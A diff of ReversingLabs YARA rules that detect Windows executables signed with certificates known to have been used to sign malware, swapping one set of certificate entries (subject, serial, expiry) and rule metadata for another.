REVERSINGLABS_Cert_Blocklist_60497070Ff4A83Bc87Bdea24Da5B431D : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="60:49:70:70:ff:4a:83:bc:87:bd:ea:24:da:5b:43:1d" and 1477008000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB9\\x9D\\xE6\\xB1\\x9F\\xE5\\xAE\\x8F\\xE5\\x9B\\xBE\\xE6\\x97\\xA0\\xE5\\xBF\\xA7\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="09:45:0b:8f:73:ea:43:e3:9d:2c:dd:56:04:9d:be:40" and 1561602110<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Efd9Bd4B4281C6522D96011Df46C9C4 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "5eaac242-ca22-5c73-9027-308d351080bf" + id = "7bd6616b-fef7-56aa-a78a-606601afa4f3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15188-L15204" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f76d21e0ae2cf9b28825c813fc509d533c10aba38f8f0c2884365047c1272c1f" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9294-L9310" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "8f8a5e3457c05c5e70e33041c5b0b971cf8f19313d47055fd760ed17d94c8794" score = 75 quality = 90 tags = "INFO, FILE" @@ -21187,22 +40978,22 @@ rule REVERSINGLABS_Cert_Blocklist_0A333E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Coulomb Limited" and pe.signatures[i].serial=="0a:33:3e" and 1052750648<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0e:fd:9b:d4:b4:28:1c:65:22:d9:60:11:df:46:c9:c4" and 1586249095<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Dd7D4A785990584D8C0837659173272 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "774e28f7-46ba-533d-a73c-00d2536c7d2b" + id = "d5e3d85b-cc4e-5522-8558-f2703c38c4e6" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15206-L15222" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "776402fc3a7de4843373bc1981f965fe9c2a9f1fe2374b142a96952fd05a591b" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9312-L9328" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d18a479f07f2bdb890437e2bcb0213abdfb0eb684cdaf17c5eb0583039f2edb4" score = 75 quality = 90 tags = "INFO, FILE" @@ -21212,22 +41003,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Cb6519B2528D006D1Da987153Dad2B3 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "D and D Internet Services" and pe.signatures[i].serial=="1c:b6:51:9b:25:28:d0:06:d1:da:98:71:53:da:d2:b3" and 1012780800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE9\\x9B\\xB7\\xE7\\xA5\\x9E\\xEF\\xBC\\x88\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xEF\\xBC\\x89\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0d:d7:d4:a7:85:99:05:84:d8:c0:83:76:59:17:32:72" and 1586249095<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C59D46580F039Af2C4Ab6Ba0Ffed197 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "606749dc-f4ef-526a-8583-486401866759" + id = "969e05a1-8ae1-5ea6-9607-5bf164f34e7b" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15224-L15240" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "67c9fd92681d6dd1172509113e167e74e07f1f86fd62456758b3e3930180b528" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9330-L9346" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "32eea2a436f386ef44a00ef72be8be7d4070b02f84ba71c7ee1ca407fddce8ec" score = 75 quality = 90 tags = "INFO, FILE" @@ -21237,22 +41028,22 @@ rule REVERSINGLABS_Cert_Blocklist_621E696C3A6371E77A678Cbf0Ee34Ab2 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="62:1e:69:6c:3a:63:71:e7:7a:67:8c:bf:0e:e3:4a:b2" and 1467072000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0c:59:d4:65:80:f0:39:af:2c:4a:b6:ba:0f:fe:d1:97" and 1585108595<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0448Ec8D26597F99912138500Cc41C1B : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "333a0901-21e7-5b4a-8daa-6a04fc2c4e86" + id = "0c306a1f-e810-5988-a44c-964b6a67c918" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15242-L15258" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "54ca9b19adfc9357a3fb74f0670ad929319c4d06a7de7ae400f8285a31052276" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9348-L9364" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "001556c31cfb0d94978adc48dc0d24c83666512348c65508975cc9e1a119aeae" score = 75 quality = 90 tags = "INFO, FILE" @@ -21262,22 +41053,22 @@ rule REVERSINGLABS_Cert_Blocklist_21B991 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Web Nexus d.o.o." and pe.signatures[i].serial=="21:b9:91" and 1125477041<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE5\\xA4\\xA7\\xE8\\xBF\\x9E\\xE7\\xBA\\xB5\\xE6\\xA2\\xA6\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="04:48:ec:8d:26:59:7f:99:91:21:38:50:0c:c4:1c:1b" and 1585108595<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0108Cbaee60728F5Bf06E45A56D6F170 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8c362133-a30f-599d-88e0-a1448433178a" + id = "2be3a0d2-2c6a-5c66-856a-d3a70a490ba3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15260-L15276" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a2d04275b9fe37308c8f1dca75f4cc3c4a8985930f901e1f46e3ddc2977eea32" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9366-L9382" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "52027548e20c819e73ea5e9afd87faaca4498bc39e54dd30ad99a24e3ace57fd" score = 75 quality = 90 tags = "INFO, FILE" @@ -21287,22 +41078,22 @@ rule REVERSINGLABS_Cert_Blocklist_1Cc37De5Dbed097F98F56Dbc : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="1c:c3:7d:e5:db:ed:09:7f:98:f5:6d:bc" and 1476693977<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE4\\xB8\\x9C\\xE6\\xB9\\x96\\xE6\\x96\\xB0\\xE6\\x8A\\x80\\xE6\\x9C\\xAF\\xE5\\xBC\\x80\\xE5\\x8F\\x91\\xE5\\x8C\\xBA" and pe.signatures[i].serial=="01:08:cb:ae:e6:07:28:f5:bf:06:e4:5a:56:d6:f1:70" and 1605680260<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_038D56A12153E8B5C74C69Bff65Cbe3F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9938b4c5-4a2b-5f4a-92a0-28c3519b1ed3" + id = "48162554-a95b-5cd3-9bbb-bcf6a1d96592" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15278-L15294" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "28f71c0572e769d4a0cb289071912bc79cddfd98a3a8161c5400c7bee7090bf5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9384-L9400" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ed3a81231f93f9d2ae462481503ba37072c3800dd1379baae11737f093a27af1" score = 75 quality = 90 tags = "INFO, FILE" @@ -21312,22 +41103,22 @@ rule REVERSINGLABS_Cert_Blocklist_50F66Ab0D7Ed19B69D48F635E69572Fa : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Wei Liu" and pe.signatures[i].serial=="50:f6:6a:b0:d7:ed:19:b6:9d:48:f6:35:e6:95:72:fa" and 1467158400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE6\\xAD\\xA6\\xE6\\xB1\\x89\\xE5\\x86\\x85\\xE7\\x91\\x9F\\xE6\\x96\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="03:8d:56:a1:21:53:e8:b5:c7:4c:69:bf:f6:5c:be:3f" and 1605680260<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_060D94E2Ccae84536654D9Daf39Fef1E : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "7609083d-145b-5594-a04b-72c2862873eb" + id = "ac5d29ef-fd52-536b-bcbc-44433dda8a21" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15296-L15312" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "63d4c1aaafdf6de14d0ae78035644cf6b0fefab8b0063d2566ca38af9f9498d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9402-L9418" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "49000f3a3ce1ad9aef87162d7527b8f062e0aa12276b82c7335f0ccc14b7d38a" score = 75 quality = 90 tags = "INFO, FILE" @@ -21337,22 +41128,22 @@ rule REVERSINGLABS_Cert_Blocklist_11212F502836A784752160351Defb136Cf09 : INFO FI importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "EVANGEL TECHNOLOGY(HK) LIMITED" and pe.signatures[i].serial=="11:21:2f:50:28:36:a7:84:75:21:60:35:1d:ef:b1:36:cf:09" and 1463726573<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HasCred ApS" and pe.signatures[i].serial=="06:0d:94:e2:cc:ae:84:53:66:54:d9:da:f3:9f:ef:1e" and 1627948800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0Bc9B800F480691Bd6B60963466B0C75 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4e17aed7-fd76-549f-bcf7-84c97efc44e4" + id = "614f88ca-183a-548b-99f1-30cf4c4027ce" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15314-L15330" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "917f324cbe91718efc9b2f41ef947fa8f1a501dde319936774d702d57b1e6b37" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9420-L9436" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6a498fd30c611976e9aad2f9b85b13c3c29246582cdfefc800615db88e40dac2" score = 75 quality = 90 tags = "INFO, FILE" @@ -21362,22 +41153,22 @@ rule REVERSINGLABS_Cert_Blocklist_2C16Be9A7Ce2A23Ab7A4B4Eb7Da3400C : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Prince city music bar" and pe.signatures[i].serial=="2c:16:be:9a:7c:e2:a2:3a:b7:a4:b4:eb:7d:a3:40:0c" and 1371081600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HasCred ApS" and pe.signatures[i].serial=="0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" and 1629158400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0C4324Ff41F0A7B16Ffcc93Dffa8Fa99 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "218543f3-298f-5038-8fa9-3abeda9e4d8f" + id = "34594a57-f9fd-5b9d-afb6-691be33da9b5" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15332-L15348" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "b348c502aeae036f6d17283260ed4479427f89c8c25f2b6d59e137e90694dbe4" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9438-L9454" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d3ce83fb0497c533a5474d46300c341677ec243686723783798bfbaec4f6e369" score = 75 quality = 90 tags = "INFO, FILE" @@ -21387,22 +41178,22 @@ rule REVERSINGLABS_Cert_Blocklist_22Accad235Fb1Ac7422Ebe5Ea7Ac9Bc5 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "IMS INTERACTIVE MEDIA SOLUTIONS" and pe.signatures[i].serial=="22:ac:ca:d2:35:fb:1a:c7:42:2e:be:5e:a7:ac:9b:c5" and 1019001600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE7\\xA6\\x8F\\xE5\\xBB\\xBA\\xE7\\x9C\\x81\\xE4\\xBA\\x94\\xE6\\x98\\x9F\\xE4\\xBF\\xA1\\xE6\\x81\\xAF\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="0c:43:24:ff:41:f0:a7:b1:6f:fc:c9:3d:ff:a8:fa:99" and 1600300800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_0B980Fc8783E4F158E41829Ab21Bab81 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e1834597-4e45-5866-97f4-e00c79190930" + id = "f7358f71-421f-57fa-abdf-ab479f4b7007" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15350-L15366" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "78ede4b02cb1b07500cd0c4f1f33da598938940d0f58430edda00d79b19b16a5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9456-L9472" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "b0f43caec1cfc5b2d1512d7fcf0bcf1e02fc81764b4376b081f38c4de328eab2" score = 75 quality = 90 tags = "INFO, FILE" @@ -21412,22 +41203,22 @@ rule REVERSINGLABS_Cert_Blocklist_4D29757C4Fbfc32B97091D96E3723002 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="4d:29:75:7c:4f:bf:c3:2b:97:09:1d:96:e3:72:30:02" and 1474848000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Idris Kanchwala Holding Corp." and pe.signatures[i].serial=="0b:98:0f:c8:78:3e:4f:15:8e:41:82:9a:b2:1b:ab:81" and 1631750400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D8F515715Aeffef0A0E4E37F16C254Fa : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "6ea47017-1296-5409-8ff2-ef69434233ff" + id = "50ffd0a0-d861-53d7-a7dc-f74ccc49eff8" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15368-L15384" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "88c63a921a300e1b985d084c3ab1a2485713b4c674dafd419d092e5562f121d7" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9474-L9492" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3c7d57a655f76a6e5ef6b0e770db7c91d0830b6b0b37caef5ef9e3e78ad1fd75" score = 75 quality = 90 tags = "INFO, FILE" @@ -21437,22 +41228,22 @@ rule REVERSINGLABS_Cert_Blocklist_3A949Ef03D9Dd2D150B24B274Ff6D7B4 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="3a:94:9e:f0:3d:9d:d2:d1:50:b2:4b:27:4f:f6:d7:b4" and 1474156800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "HOLDING LA LTD" and (pe.signatures[i].serial=="00:d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa" or pe.signatures[i].serial=="d8:f5:15:71:5a:ef:fe:f0:a0:e4:e3:7f:16:c2:54:fa") and 1619136000<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_D79739187C585E453C00Afc11D77B523 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "70e770dd-95fd-5273-b6ee-9bb5eea30e3b" + id = "ed427336-6833-5e09-8ebe-039c8cd50846" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15386-L15404" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "84ddc08a0a55200f644778a0e3482f15e82d74c524f12a7ad91b1c3d4acfc731" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9494-L9512" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "6d6db87227d7be559afa67c4f2b65b01f26741fdf337d920241a633bb036426f" score = 75 quality = 90 tags = "INFO, FILE" @@ -21462,22 +41253,22 @@ rule REVERSINGLABS_Cert_Blocklist_954D0577D5Ce8999E0387A5364829F66 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Soblosol Limited" and (pe.signatures[i].serial=="00:95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66" or pe.signatures[i].serial=="95:4d:05:77:d5:ce:89:99:e0:38:7a:53:64:82:9f:66") and 1543968000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SAN MARINO INVESTMENTS PTY LTD" and (pe.signatures[i].serial=="00:d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23" or pe.signatures[i].serial=="d7:97:39:18:7c:58:5e:45:3c:00:af:c1:1d:77:b5:23") and 1631059200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_961Cecb0227845317549E9343A980E91 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8dfc50be-7316-5a52-937b-4551aa642b7e" + id = "f319592a-5f08-5f2c-b840-5f897695e054" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L15406-L15424" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "3b5e5b81890f1dea3dc0858cade54e7f88a21861818be79c3e7fba066f80d491" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L9514-L9532" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "c74512e95e2d6aedecb1dbd30fac6fde40d1e9520c89b785519694d9bc9ba854" score = 75 quality = 90 tags = "INFO, FILE" @@ -21487,22 +41278,22 @@ rule REVERSINGLABS_Cert_Blocklist_Df5121Dc99D1Ab6B7E5229F6832123Ef : INFO FILE importance = 25 condition: 